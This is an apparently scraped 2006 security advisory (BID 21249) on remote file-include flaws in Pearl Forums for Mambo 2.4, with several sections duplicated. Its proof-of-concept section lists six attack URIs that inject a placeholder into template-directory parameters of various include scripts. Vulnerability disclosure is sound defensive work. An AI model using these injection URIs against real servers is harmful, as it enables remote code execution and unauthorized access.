Pearl Forums for Mambo Multiple Remote File Include Vulnerabilities
BID:21249
Info
Pearl Forums for Mambo Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 21249 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 22 2006 12:00AM |
| Updated: | Nov 24 2006 08:25PM |
| Credit: | Dr Max Virus is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
Pearl Forums Pearl For Mambo 2.4 |
| Not Vulnerable: | |
Discussion
Pearl Forums for Mambo Multiple Remote File Include Vulnerabilities
Pearl Forums for Mambo is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
Version 2.4 is vulnerable to these issues; other versions may also be affected.
Pearl Forums for Mambo is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
Version 2.4 is vulnerable to these issues; other versions may also be affected.
Exploit / POC
Pearl Forums for Mambo Multiple Remote File Include Vulnerabilities
An attacker may exploit these issues using a web client.
The following proof-of-concept URIs are available:
http://www.example.com/[path]/includes/admin.php?templatesDirectory-evill code
http://www.example.com//[path]/includes/password.php?GlobalSettings[templatesDirectory]=evill code
http://www.example.com//[path]/includes/profile.php?GlobalSettings[templatesDirectory]=evill code
http://www.example.com//[path]/includes/merge.php?GlobalSettings[templatesDirectory]=evill code
http://www.example.com//[path]/includes/adminPolls.php?GlobalSettings[templatesDirectory]=evill code
http://www.example.com//[path]/includes/poll.php?GlobalSettings[templatesDirectory]=evill code
An attacker may exploit these issues using a web client.
The following proof-of-concept URIs are available:
http://www.example.com/[path]/includes/admin.php?templatesDirectory-evill code
http://www.example.com//[path]/includes/password.php?GlobalSettings[templatesDirectory]=evill code
http://www.example.com//[path]/includes/profile.php?GlobalSettings[templatesDirectory]=evill code
http://www.example.com//[path]/includes/merge.php?GlobalSettings[templatesDirectory]=evill code
http://www.example.com//[path]/includes/adminPolls.php?GlobalSettings[templatesDirectory]=evill code
http://www.example.com//[path]/includes/poll.php?GlobalSettings[templatesDirectory]=evill code
Solution / Fix
Pearl Forums for Mambo Multiple Remote File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Pearl Forums for Mambo Multiple Remote File Include Vulnerabilities
References:
References:
- Pearl Forums Web Page (Pearl Forums )